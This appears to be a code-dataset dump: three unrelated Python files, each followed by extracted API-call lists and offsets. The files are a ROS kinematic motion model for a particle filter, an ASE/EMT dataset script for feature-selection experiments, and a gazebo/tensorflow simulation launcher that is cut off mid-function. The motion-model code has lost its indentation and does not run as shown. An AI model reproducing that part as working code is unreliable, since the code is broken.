# KM_X_FIX_NOISE = 1e-2 # Kinematic car x position constant noise std dev
# KM_Y_FIX_NOISE = 1e-2 # Kinematic car y position constant noise std dev
# KM_THETA_FIX_NOISE = 1e-2 # Kinematic car theta constant noise std dev
"""
Propagates the particles forward based on the velocity and steering angle of the car
"""
class KinematicMotionModel:
"""
Initializes the kinematic motion model
motor_state_topic: The topic containing motor state information
servo_state_topic: The topic containing servo state information
speed_to_erpm_offset: Offset conversion param from rpm to speed
speed_to_erpm_gain: Gain conversion param from rpm to speed
steering_angle_to_servo_offset: Offset conversion param from servo position to steering angle
steering_angle_to_servo_gain: Gain conversion param from servo position to steering angle
car_length: The length of the car
particles: The particles to propagate forward
state_lock: Controls access to particles
"""
def __init__(
self,
motor_state_topic,
servo_state_topic,
speed_to_erpm_offset,
speed_to_erpm_gain,
steering_to_servo_offset,
steering_to_servo_gain,
car_length,
particles,
state_lock=None,
):
self.last_servo_cmd = None # The most recent servo command
self.last_vesc_stamp = None # The time stamp from the previous vesc state msg
self.particles = particles
self.SPEED_TO_ERPM_OFFSET = (
speed_to_erpm_offset # Offset conversion param from rpm to speed
)
self.SPEED_TO_ERPM_GAIN = (
speed_to_erpm_gain # Gain conversion param from rpm to speed
)
self.STEERING_TO_SERVO_OFFSET = steering_to_servo_offset # Offset conversion param from servo position to steering angle
self.STEERING_TO_SERVO_GAIN = steering_to_servo_gain # Gain conversion param from servo position to steering angle
self.CAR_LENGTH = car_length # The length of the car
if state_lock is None:
self.state_lock = Lock()
else:
self.state_lock = state_lock
# This subscriber just caches the most recent servo position command
self.servo_pos_sub = rospy.Subscriber(
servo_state_topic, Float64, self.servo_cb, queue_size=1
)
# Subscribe to the state of the vesc
self.motion_sub = rospy.Subscriber(
motor_state_topic, VescStateStamped, self.motion_cb, queue_size=1
)
"""
Caches the most recent servo command
msg: A std_msgs/Float64 message
"""
def servo_cb(self, msg):
self.last_servo_cmd = msg.data # Update servo command
"""
Converts messages to controls and applies the kinematic car model to the
particles
msg: a vesc_msgs/VescStateStamped message
"""
def motion_cb(self, msg):
self.state_lock.acquire()
if self.last_servo_cmd is None:
self.state_lock.release()
return
if self.last_vesc_stamp is None:
print("Vesc callback called for first time....")
self.last_vesc_stamp = msg.header.stamp
self.state_lock.release()
return
# Convert raw msgs to controls
# Note that control = (raw_msg_val - offset_param) / gain_param
curr_speed = (
msg.state.speed - self.SPEED_TO_ERPM_OFFSET
) / self.SPEED_TO_ERPM_GAIN
curr_steering_angle = (
self.last_servo_cmd - self.STEERING_TO_SERVO_OFFSET
) / self.STEERING_TO_SERVO_GAIN
dt = (msg.header.stamp - self.last_vesc_stamp).to_sec()
# Propagate particles forward in place
self.apply_motion_model(
proposal_dist=self.particles, control=[curr_speed, curr_steering_angle, dt]
)
self.last_vesc_stamp = msg.header.stamp
self.state_lock.release()
def apply_motion_model(self, proposal_dist, control):
"""
Propagates particles forward (in-place) by applying the kinematic model and adding
sampled gaussian noise
proposal_dist: The particles to propagate
        control: List containing velocity, steering angle, and time interval - [v,delta,dt]
returns: nothing
"""
# Separate control
v, delta, dt = control
# Add control noise
v = np.random.normal(loc=v, scale=KM_V_NOISE, size=proposal_dist[:, 0].shape)
delta = np.random.normal(
loc=delta, scale=KM_DELTA_NOISE, size=proposal_dist[:, 0].shape
)
# apply motion model's update rule
theta = proposal_dist[:, 2]
theta_new = theta + v / self.CAR_LENGTH * np.tan(delta) * dt
# x
proposal_dist[:, 0] += (
self.CAR_LENGTH / np.tan(delta) * (np.sin(theta_new) - np.sin(theta))
)
# y
proposal_dist[:, 1] += (
self.CAR_LENGTH / np.tan(delta) * (-np.cos(theta_new) + np.cos(theta))
)
# Add noise
proposal_dist[:, 0] = np.random.normal(
loc=proposal_dist[:, 0],
scale=KM_X_FIX_NOISE,
size=proposal_dist[:, 0].shape,
)
proposal_dist[:, 1] = np.random.normal(
loc=proposal_dist[:, 1],
scale=KM_Y_FIX_NOISE,
size=proposal_dist[:, 1].shape,
)
proposal_dist[:, 2] = np.random.normal(
loc=theta_new, scale=KM_THETA_FIX_NOISE, size=proposal_dist[:, 2].shape
)
# print 'v: %f, delta: %f, x: %f, y: %f, theta: %f'%(np.mean(v), np.mean(delta), np.mean(proposal_dist[:,0]), np.mean(proposal_dist[:,1]), np.mean(proposal_dist[:,2]))
# Limit particle rotation to be between -pi and pi
proposal_dist[proposal_dist[:, 2] < -1 * np.pi, 2] += 2 * np.pi
proposal_dist[proposal_dist[:, 2] > np.pi, 2] -= 2 * np.pi
|
[
"numpy.random.normal",
"numpy.tan",
"threading.Lock",
"numpy.cos",
"numpy.sin",
"rospy.Subscriber"
] |
[((3544, 3617), 'rospy.Subscriber', 'rospy.Subscriber', (['servo_state_topic', 'Float64', 'self.servo_cb'], {'queue_size': '(1)'}), '(servo_state_topic, Float64, self.servo_cb, queue_size=1)\n', (3560, 3617), False, 'import rospy\n'), ((3711, 3798), 'rospy.Subscriber', 'rospy.Subscriber', (['motor_state_topic', 'VescStateStamped', 'self.motion_cb'], {'queue_size': '(1)'}), '(motor_state_topic, VescStateStamped, self.motion_cb,\n queue_size=1)\n', (3727, 3798), False, 'import rospy\n'), ((5694, 5767), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'v', 'scale': 'KM_V_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=v, scale=KM_V_NOISE, size=proposal_dist[:, 0].shape)\n', (5710, 5767), True, 'import numpy as np\n'), ((5784, 5870), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'delta', 'scale': 'KM_DELTA_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=delta, scale=KM_DELTA_NOISE, size=proposal_dist[:, 0].\n shape)\n', (5800, 5870), True, 'import numpy as np\n'), ((6363, 6463), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'proposal_dist[:, 0]', 'scale': 'KM_X_FIX_NOISE', 'size': 'proposal_dist[:, 0].shape'}), '(loc=proposal_dist[:, 0], scale=KM_X_FIX_NOISE, size=\n proposal_dist[:, 0].shape)\n', (6379, 6463), True, 'import numpy as np\n'), ((6536, 6636), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'proposal_dist[:, 1]', 'scale': 'KM_Y_FIX_NOISE', 'size': 'proposal_dist[:, 1].shape'}), '(loc=proposal_dist[:, 1], scale=KM_Y_FIX_NOISE, size=\n proposal_dist[:, 1].shape)\n', (6552, 6636), True, 'import numpy as np\n'), ((6709, 6803), 'numpy.random.normal', 'np.random.normal', ([], {'loc': 'theta_new', 'scale': 'KM_THETA_FIX_NOISE', 'size': 'proposal_dist[:, 2].shape'}), '(loc=theta_new, scale=KM_THETA_FIX_NOISE, size=\n proposal_dist[:, 2].shape)\n', (6725, 6803), True, 'import numpy as np\n'), ((3375, 3381), 'threading.Lock', 'Lock', ([], {}), '()\n', (3379, 3381), False, 'from threading import Lock\n'), ((6112, 6125), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6118, 6125), True, 'import numpy as np\n'), ((6129, 6146), 'numpy.sin', 'np.sin', (['theta_new'], {}), '(theta_new)\n', (6135, 6146), True, 'import numpy as np\n'), ((6149, 6162), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (6155, 6162), True, 'import numpy as np\n'), ((6249, 6262), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6255, 6262), True, 'import numpy as np\n'), ((6287, 6300), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (6293, 6300), True, 'import numpy as np\n'), ((6018, 6031), 'numpy.tan', 'np.tan', (['delta'], {}), '(delta)\n', (6024, 6031), True, 'import numpy as np\n'), ((6267, 6284), 'numpy.cos', 'np.cos', (['theta_new'], {}), '(theta_new)\n', (6273, 6284), True, 'import numpy as np\n')]
|
from ase import Atoms
from ase.calculators.emt import EMT
from ase.io.trajectory import Trajectory
from ase.io import read
import numpy as np
import pandas as pd
import argparse
import copy
import os
import pdb
import pickle
from model_eval import model_evaluation
from gmp_feature_selection import backward_elimination
def main():
dir_prefix = "/storage/home/hpaceice1/plai30/sandbox"
parallel_workspace = os.path.join(dir_prefix, "pace/parallel_workspace")
OUTPUT_DIR = os.path.join(dir_prefix, "output")
#setup dataset
np.random.seed(3)
distances = np.linspace(2, 5, 500)
images = []
for i in range(len(distances)):
l = distances[i]
image = Atoms(
"CuCO",
[
(-l * np.sin(0.65), l * np.cos(0.65), np.random.uniform(low=-4.0, high=4.0)),
(0, 0, 0),
(l * np.sin(0.65), l * np.cos(0.65), np.random.uniform(low=-4.0, high=4.0))
],
)
image.set_cell([10, 10, 10])
image.wrap(pbc=True)
image.set_calculator(EMT())
images.append(image)
elements = ["Cu","C","O"]
atom_gaussians = {"C": os.path.join(dir_prefix, "config/MCSH_potential/C_coredensity_5.g"),
"O": os.path.join(dir_prefix, "config/MCSH_potential/O_totaldensity_7.g"),
"Cu": os.path.join(dir_prefix, "config/MCSH_potential/Cu_totaldensity_5.g")}
data = model_evaluation.dataset(elements, images, atom_gaussians=atom_gaussians)
#set up evaluation parameters
cutoff = 8
sigmas = (np.logspace(np.log10(0.05), np.log10(1.0), num=5)).tolist()
model_eval_params = model_evaluation.get_model_eval_params(
fp_type="gmp", eval_type="k_fold_cv", eval_num_folds=2, eval_cv_iters=1,
cutoff=cutoff, sigmas=sigmas, nn_layers=3, nn_nodes=20, nn_learning_rate=1e-3,
nn_batch_size=32, nn_epochs=1000)
back_elim = backward_elimination.backward_elimination(data, model_eval_params)
back_elim.run(enable_parallel=True, parallel_workspace=parallel_workspace, seed=1, output_dir=OUTPUT_DIR)
if __name__ == "__main__":
main()
|
[
"model_eval.model_evaluation.dataset",
"gmp_feature_selection.backward_elimination.backward_elimination",
"numpy.log10",
"os.path.join",
"model_eval.model_evaluation.get_model_eval_params",
"ase.calculators.emt.EMT",
"numpy.linspace",
"numpy.random.seed",
"numpy.cos",
"numpy.random.uniform",
"numpy.sin"
] |
[((419, 470), 'os.path.join', 'os.path.join', (['dir_prefix', '"""pace/parallel_workspace"""'], {}), "(dir_prefix, 'pace/parallel_workspace')\n", (431, 470), False, 'import os\n'), ((488, 522), 'os.path.join', 'os.path.join', (['dir_prefix', '"""output"""'], {}), "(dir_prefix, 'output')\n", (500, 522), False, 'import os\n'), ((547, 564), 'numpy.random.seed', 'np.random.seed', (['(3)'], {}), '(3)\n', (561, 564), True, 'import numpy as np\n'), ((581, 603), 'numpy.linspace', 'np.linspace', (['(2)', '(5)', '(500)'], {}), '(2, 5, 500)\n', (592, 603), True, 'import numpy as np\n'), ((1442, 1515), 'model_eval.model_evaluation.dataset', 'model_evaluation.dataset', (['elements', 'images'], {'atom_gaussians': 'atom_gaussians'}), '(elements, images, atom_gaussians=atom_gaussians)\n', (1466, 1515), False, 'from model_eval import model_evaluation\n'), ((1664, 1901), 'model_eval.model_evaluation.get_model_eval_params', 'model_evaluation.get_model_eval_params', ([], {'fp_type': '"""gmp"""', 'eval_type': '"""k_fold_cv"""', 'eval_num_folds': '(2)', 'eval_cv_iters': '(1)', 'cutoff': 'cutoff', 'sigmas': 'sigmas', 'nn_layers': '(3)', 'nn_nodes': '(20)', 'nn_learning_rate': '(0.001)', 'nn_batch_size': '(32)', 'nn_epochs': '(1000)'}), "(fp_type='gmp', eval_type='k_fold_cv',\n eval_num_folds=2, eval_cv_iters=1, cutoff=cutoff, sigmas=sigmas,\n nn_layers=3, nn_nodes=20, nn_learning_rate=0.001, nn_batch_size=32,\n nn_epochs=1000)\n", (1702, 1901), False, 'from model_eval import model_evaluation\n'), ((1993, 2059), 'gmp_feature_selection.backward_elimination.backward_elimination', 'backward_elimination.backward_elimination', (['data', 'model_eval_params'], {}), '(data, model_eval_params)\n', (2034, 2059), False, 'from gmp_feature_selection import backward_elimination\n'), ((1166, 1233), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/C_coredensity_5.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/C_coredensity_5.g')\n", (1178, 1233), False, 'import os\n'), ((1262, 1330), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/O_totaldensity_7.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/O_totaldensity_7.g')\n", (1274, 1330), False, 'import os\n'), ((1360, 1429), 'os.path.join', 'os.path.join', (['dir_prefix', '"""config/MCSH_potential/Cu_totaldensity_5.g"""'], {}), "(dir_prefix, 'config/MCSH_potential/Cu_totaldensity_5.g')\n", (1372, 1429), False, 'import os\n'), ((1072, 1077), 'ase.calculators.emt.EMT', 'EMT', ([], {}), '()\n', (1075, 1077), False, 'from ase.calculators.emt import EMT\n'), ((1592, 1606), 'numpy.log10', 'np.log10', (['(0.05)'], {}), '(0.05)\n', (1600, 1606), True, 'import numpy as np\n'), ((1608, 1621), 'numpy.log10', 'np.log10', (['(1.0)'], {}), '(1.0)\n', (1616, 1621), True, 'import numpy as np\n'), ((792, 829), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-4.0)', 'high': '(4.0)'}), '(low=-4.0, high=4.0)\n', (809, 829), True, 'import numpy as np\n'), ((912, 949), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-4.0)', 'high': '(4.0)'}), '(low=-4.0, high=4.0)\n', (929, 949), True, 'import numpy as np\n'), ((760, 772), 'numpy.sin', 'np.sin', (['(0.65)'], {}), '(0.65)\n', (766, 772), True, 'import numpy as np\n'), ((778, 790), 'numpy.cos', 'np.cos', (['(0.65)'], {}), '(0.65)\n', (784, 790), True, 'import numpy as np\n'), ((880, 892), 'numpy.sin', 'np.sin', (['(0.65)'], {}), '(0.65)\n', (886, 892), True, 'import numpy as np\n'), ((898, 910), 'numpy.cos', 'np.cos', (['(0.65)'], {}), '(0.65)\n', (904, 910), True, 'import numpy 
as np\n')]
|
#!/usr/bin/python
"""
Run_long_script governs the running of long gazebo_ros_tensorflow simulations.
The core functionality lies in:
1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)
2. different crash handling when for instance starting gazebo / tensorflow fails
The script is organized in different steps:
1. Parsing arguments saved in a name space
2. launching ROS and robot related parameters
3. launching tensorflow in machine (docker/singularity/virtualenv) environment
4. launching experiment with potentially autogenerated gazebo world
Exit code:
0) normal exit code
2) tensorflow stopped working
3) communication with logfolder (Opal) is blocked
4) config file is missing
Example usage:
Fly the drone with behavior arbitration through the default canyon in a singularity environment once, while saving images.
python run_script.py --robot drone_sim --fsm oracle_drone_fsm --world canyon --reuse_default_world -n 1 -ds -p params.yaml
Author: <NAME>
Dependencies: simulation_supervised, pilot, klaas_robots
"""
import rospy
from std_srvs.srv import Empty as Emptyservice
from std_srvs.srv import EmptyRequest # for pausing and unpausing physics engine
from geometry_msgs.msg import Pose
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.srv import SetModelStateRequest
from gazebo_msgs.msg import ModelState
import ast # to parse startingpositions as string to list
import sys, os, os.path
import subprocess, shlex
import shutil
import time
import signal
import argparse
import yaml
import fnmatch
import numpy as np
class bcolors:
""" Colors to print in terminal with color!
"""
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# global variables for Popen objects used for terminating sessions
ros_popen = None
python_popen = None
gazebo_popen = None
crash_number = 0
run_number = 0
def myprint(message):
"""
  Output is not captured on the computing cluster,
  so also write it to logfolder/output.
"""
print(message)
with open(FLAGS.summary_dir+FLAGS.log_tag+'/output','a') as f:
f.write(message+'\n')
# Predefined functions.
def load_param_file(location):
"""Load yaml as dict and change to proper string arguments.
Note that current implementation will by default change both --key True and --key False to --key."""
yaml_dict={}
with open(location, 'r') as stream:
try:
yaml_dict=yaml.load(stream)
except yaml.YAMLError as exc:
myprint(exc)
yaml_str=""
for k in yaml_dict.keys():
if isinstance(yaml_dict[k],bool):
yaml_str = "{0} --{1}".format(yaml_str, k)
else:
yaml_str = "{0} --{1} {2}".format(yaml_str, k, yaml_dict[k])
return yaml_str
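# Illustrative behaviour of load_param_file (assuming a params.yaml such as):
#   nn_layers: 3
#   on_policy: True
# the returned string would be " --nn_layers 3 --on_policy"
# (boolean values are dropped and only the flag itself is kept).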
def wait_for_gazebo():
"""gazebo popen is not enough to get gzserver to stop so wait longer..."""
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","gz"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
myprint("{0}: wait for gazebo".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
out = p_grep.communicate()[0]
while "gzserver" in out:
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","gz"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
out = p_grep.communicate()[0]
time.sleep(0.2)
time.sleep(1)
def wait_for_create_dataset():
"""gazebo popen is not enough to get gzserver to stop so wait longer..."""
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","create_dataset"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
myprint("{0}: wait for create_dataset".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
out = p_grep.communicate()[0]
while "create_dataset" in out:
p_ps = subprocess.Popen(["ps", "-ef"], stdout=subprocess.PIPE)
p_grep = subprocess.Popen(["grep","create_dataset"],stdin=p_ps.stdout, stdout=subprocess.PIPE)
out = p_grep.communicate()[0]
time.sleep(0.2)
def wait_for_ros_to_start():
"""Ros might take some time to start the first time so wait till its well in the ps -ef"""
time.sleep(1)
p_ps = subprocess.call(["rosparam", "list"], stdout=subprocess.PIPE)
while p_ps == 1:
myprint("{0}: wait for ros".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
time.sleep(1)
p_ps = subprocess.call(["rosparam", "list"], stdout=subprocess.PIPE)
def kill_popen(process_name, process_popen):
"""Check status, terminate popen and wait for it to stop."""
myprint("{0}: terminate {1}".format(time.strftime("%Y-%m-%d_%I:%M:%S"), process_name))
  if process_popen.poll() is None:
process_popen.terminate()
process_popen.wait()
def kill_combo():
"""kill ros, python and gazebo pids and wait for them to finish"""
global ros_popen, python_popen, gazebo_popen
if gazebo_popen: kill_popen('gazebo', gazebo_popen)
wait_for_gazebo()
if python_popen: kill_popen('python', python_popen)
if ros_popen: kill_popen('ros', ros_popen)
time.sleep(5)
##########################################################################################################################
# STEP 1 Load Parameters
parser = argparse.ArgumentParser(description="""Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.
The core functionality lies in:
1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)
2. different crash handling when for instance starting gazebo / tensorflow fails""")
# ==========================
# General Settings
# ==========================
parser.add_argument("--summary_dir", default='tensorflow/log/', type=str, help="Choose the directory to which tensorflow should save the summaries.")
parser.add_argument("--data_root", default='pilot_data/', type=str, help="Choose the directory to which tensorflow should save the summaries.")
parser.add_argument("--code_root", default='~', type=str, help="Choose the directory to which tensorflow should save the summaries.")
parser.add_argument("-t", "--log_tag", default='testing_on_policy', type=str, help="LOGTAG: tag used to name logfolder.")
parser.add_argument("--data_location", default='', type=str, help="Datalocation is by default the log_tag but than in data_root instead of summary_dir, otherwise FLAG should indicate relative path to data_root.")
parser.add_argument("-n", "--number_of_runs", default=-1, type=int, help="NUMBER_OF_RUNS: define the number of runs the robot will be trained/evaluated. n=1 avoids a hard stop after 5minutes.")
parser.add_argument("-g", "--graphics", action='store_true', help="Add extra nodes for visualization e.g.: Gazebo GUI, control display, depth prediction, ...")
parser.add_argument("-e", "--evaluation", action='store_true',help="This script can launch 2 modes of experiments: training (default) or evaluation.")
parser.add_argument("--evaluate_every", default=10, type=int, help="Evaluate every N runs when training.")
parser.add_argument("--final_evaluation_runs", default=5, type=int, help="Evaluate N times after training is finished..")
parser.add_argument("-ds", "--create_dataset", action='store_true',help="In case of True, sensor data is saved.")
parser.add_argument("--owr", action='store_true',help="Delete dataset if it is already there.")
parser.add_argument("--save_only_success", action='store_true',help="In case of True, sensor data is saved.")
parser.add_argument("--random_seed", type=int, help="If provided, the simulation is seeded (as good as possible).")
# ==========================
# Robot Settings
# ==========================
parser.add_argument("--robot",default='drone_sim', type=str, help="Specify the robot configuration file: turtle_sim(default), drone_sim, turtle_real, drone_real.")
parser.add_argument("-r", "--recovery", action='store_true',help="Use drone with recovery camera's attached.")
# ==========================
# Tensorflow Settings
# ==========================
parser.add_argument("-m","--checkpoint_path", type=str, help="Specify the directory of the checkpoint of the earlier trained model.")
parser.add_argument("-pe","--python_environment",default='sing', type=str, help="Define which environment should be loaded in shell when launching tensorlfow. Possibilities: sing, docker, virtualenv.")
parser.add_argument("-pp","--python_project",default='pytorch_pilot/pilot', type=str, help="Define which python module should be started with ~/tenorflow/PROJECT_NAME/main.py: q-learning/pilot, pilot/pilot, ddpg, ....")
# ==========================
# Environment Settings
# ==========================
parser.add_argument("--auto_go", action='store_true',help="Publish /go signal after few launching gazebo to start experiment automatically")
parser.add_argument("--reuse_default_world", action='store_true',help="reuse the default forest/canyon/sandbox instead of generating them on the fly.")
parser.add_argument("--one_world", action='store_true',help="Reuse one world to train in over and over again.")
parser.add_argument("-w","--world",dest='worlds', action='append', nargs=1, help="Define different worlds: corridor, canyon, forest, sandbox, esat_v1, esat_v2, ... .")
# parser.add_argument("-p","--paramfile",default='eva_params.yaml',type=str, help="Add more parameters to the command loading the DNN in tensorflow ex: eva_params.yaml or params.yaml.")
parser.add_argument("--fsm",default='nn_drone_fsm',type=str, help="Define the fsm loaded from /simsup/config/fsm: nn_turtle_fsm, console_fsm, console_nn_db_turtle_fsm, ...")
parser.add_argument("--x_pos",default=999,type=float, help="Specify x position.")
parser.add_argument("--x_var",default=0,type=float, help="Specify variation in x position.")
parser.add_argument("--y_pos",default=999,type=float, help="Specify y position.")
parser.add_argument("--y_var",default=0,type=float, help="Specify variation in y position.")
parser.add_argument("--z_pos",default=999,type=float, help="Specify z position.")
parser.add_argument("--z_var",default=0,type=float, help="Specify variation z position.")
parser.add_argument("--yaw_or",default=999,type=float, help="Specify yaw orientation.")
# parser.add_argument("--yaw_var",default=2*3.14,type=float, help="Specify variation in yaw orientation.")
parser.add_argument("--yaw_var",default=0,type=float, help="Specify variation in yaw orientation.")
FLAGS, others = parser.parse_known_args()
# FLAGS=parser.parse_args()
# get simulation_supervised dir
simulation_supervised_dir=subprocess.check_output(shlex.split("rospack find simulation_supervised"))[:-1]
# 3 main directories have to be defined in order to make it also runnable from a read-only system-installed singularity image.
if FLAGS.summary_dir[0] != '/': # 1. Tensorflow log directory for saving tensorflow logs and xterm logs
FLAGS.summary_dir=os.environ['HOME']+'/'+FLAGS.summary_dir
if FLAGS.data_root[0] != '/': # 2. Pilot_data directory for saving data
FLAGS.data_root=os.environ['HOME']+'/'+FLAGS.data_root
if FLAGS.code_root == '~': # 3. location for tensorflow code (and also catkin workspace though they are found with rospack)
#no explicit directory for code is set so try to parse first from environment
try:
FLAGS.code_root = os.environ['CODE']
except KeyError: # in case environment variable is not set, take home dir
FLAGS.code_root = os.environ['HOME']
if FLAGS.log_tag == 'testing_on_policy':
if os.path.isdir(FLAGS.summary_dir+FLAGS.log_tag): shutil.rmtree(FLAGS.summary_dir+FLAGS.log_tag)
if os.path.isdir(FLAGS.data_root+FLAGS.log_tag): shutil.rmtree(FLAGS.data_root+FLAGS.log_tag)
# add default values to be able to operate
if FLAGS.worlds == None : FLAGS.worlds=['canyon']
else: #worlds are appended in a nested list... so get them out.
worlds=[]
for w in FLAGS.worlds: worlds.append(w[0])
FLAGS.worlds = worlds[:]
# FLAGS.params=load_param_file(FLAGS.paramfile) if FLAGS.paramfile else ""
FLAGS.params=others[:]
if FLAGS.random_seed:
np.random.seed(FLAGS.random_seed)
FLAGS.params.append('--random_seed '+str(FLAGS.random_seed))
# check if robot configuration exists is there:
if not os.path.isfile(simulation_supervised_dir+'/config/robot/'+FLAGS.robot+'.yaml'):
myprint("Could not find robot configuration for {}".format(w[0]))
sys.exit(4)
# try to extract condor host
try:
FLAGS.condor_host=subprocess.check_output(shlex.split("cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d '=' -f 2 | cut -d '@' -f 2 | cut -d '.' -f 1)"))
except:
FLAGS.condor_host='unknown_host'
# Clear log folder if desired
if FLAGS.owr and os.path.isdir("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag)):
shutil.rmtree("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag))
# Create main log folder if necessary
if not os.path.isdir("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag)):
os.makedirs("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag))
else:
  # Load the last position to start from if last_position.txt exists (i.e. the log folder already existed)
if os.path.isfile("{0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag)):
try:
with open("{0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag),'r') as f:
last_position=f.readlines()
FLAGS.x_pos,FLAGS.y_pos,FLAGS.z_pos,FLAGS.yaw_or= [ float(x) for x in last_position[-1].strip().split(',')]
myprint("[run_script] obtained last position as {0} {1} {2} {3}".format(FLAGS.x_pos,FLAGS.y_pos,FLAGS.z_pos,FLAGS.yaw_or))
except:
myprint("[run_script] failed to obtain last position from {0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag))
# in case of data_creation, make data_location in ~/pilot_data
if FLAGS.create_dataset:
if FLAGS.data_location == "":
FLAGS.data_location = "{0}{1}".format(FLAGS.data_root, FLAGS.log_tag)
else:
FLAGS.data_location = "{0}{1}".format(FLAGS.data_root, FLAGS.data_location)
if os.path.isdir(FLAGS.data_location) and (FLAGS.number_of_runs == 1 or FLAGS.owr):
shutil.rmtree(FLAGS.data_location)
if not os.path.isdir(FLAGS.data_location):
os.makedirs(FLAGS.data_location)
else:
# check number of items already recorded
if len(os.listdir(FLAGS.data_location)) >= 1:
# in case there is already data recorded, parse the number of runs and continue from there
last_run=sorted([d for d in os.listdir(FLAGS.data_location) if os.path.isdir("{0}/{1}".format(FLAGS.data_location,d))])[-1]
run_number=int(last_run.split('_')[0]) +1 #assuming number occurs at first 5 digits xxxxx_name_of_data
myprint("Found data from previous run so adjusted run_number to {}".format(run_number))
# display and save all settings
myprint("\nSettings:")
for f in sorted(FLAGS.__dict__): myprint("{0}: {1}".format( f, FLAGS.__dict__[f]))
with open("{0}{1}/run_conf".format(FLAGS.summary_dir, FLAGS.log_tag),'w') as c:
c.write("Settings of Run_simulation_scripts:\n\n")
for f in FLAGS.__dict__: c.write("{0}: {1}\n".format(f, FLAGS.__dict__[f]))
##########################################################################################################################
# STEP 2 Start ROS with ROBOT specific parameters
# ensure location for logging the xterm outputs exists.
ros_xterm_log_dir="{0}{1}/xterm_ros".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(ros_xterm_log_dir): os.makedirs(ros_xterm_log_dir)
def start_ros():
"""Start ros core with robot parameters loaded"""
global ros_popen
command="roslaunch simulation_supervised load_params.launch robot_config:={0}.yaml {1}".format(FLAGS.robot, 'random_seed:='+str(FLAGS.random_seed) if FLAGS.random_seed else '')
if os.path.isfile(simulation_supervised_dir+'/config/environment/'+worlds[0]+'.yaml'):
command="{0} world_config:={1}".format(command, simulation_supervised_dir+'/config/environment/'+worlds[0]+'.yaml')
xterm_log_file='{0}/xterm_ros_{1}.txt'.format(ros_xterm_log_dir,time.strftime("%Y-%m-%d_%I%M"))
if os.path.isfile(xterm_log_file): os.remove(xterm_log_file)
args = shlex.split("xterm -iconic -l -lf {0} -hold -e {1}".format(xterm_log_file,command))
ros_popen = subprocess.Popen(args)
pid_ros = ros_popen.pid
myprint("{0}: start_ros pid {1}\n".format(time.strftime("%Y-%m-%d_%I:%M:%S"),pid_ros))
wait_for_ros_to_start()
rospy.set_param('evaluate_every',FLAGS.evaluate_every if not FLAGS.evaluation else 1)
rospy.set_param('recovery',FLAGS.recovery)
start_ros()
##########################################################################################################################
# STEP 3 Start tensorflow
python_xterm_log_dir="{0}{1}/xterm_python".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(python_xterm_log_dir): os.makedirs(python_xterm_log_dir)
def start_python():
"""Function that initializes python code."""
# delete default test folder
# if logdir already exists probably condor job is just restarted somewhere so use last saved q in case of training
global python_popen
# Add parameters
FLAGS.log_folder = "{0}{1}".format(FLAGS.summary_dir,FLAGS.log_tag)
FLAGS.params.append("--log_tag {0}".format(FLAGS.log_tag))
if not '--on_policy' in FLAGS.params: FLAGS.params.append("--on_policy")
if FLAGS.checkpoint_path: FLAGS.params.append("--checkpoint_path {0}".format(FLAGS.checkpoint_path))
# Create command
params=""
for p in FLAGS.params: params="{0} {1}".format(params,p)
command="{0}/scripts/launch_python/{1}.sh {2}/tensorflow/{3}/main.py {4}".format(simulation_supervised_dir,
FLAGS.python_environment,
FLAGS.code_root,
FLAGS.python_project,
params)
myprint("Tensorflow command:\n {}".format(command))
xterm_log_file='{0}/xterm_python_{1}.txt'.format(python_xterm_log_dir,time.strftime("%Y-%m-%d_%I%M"))
if os.path.isfile(xterm_log_file): os.remove(xterm_log_file)
args = shlex.split("xterm -l -lf {0} -hold -e {1}".format(xterm_log_file, command))
# Execute command
python_popen = subprocess.Popen(args)
pid_python = python_popen.pid
myprint("{0}: start_python pid {1} \n\n".format(time.strftime("%Y-%m-%d_%I:%M:%S"),pid_python))
# Wait for creation of tensorflow log file to know the python node is running
start_time = time.time()
wait_time=10
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
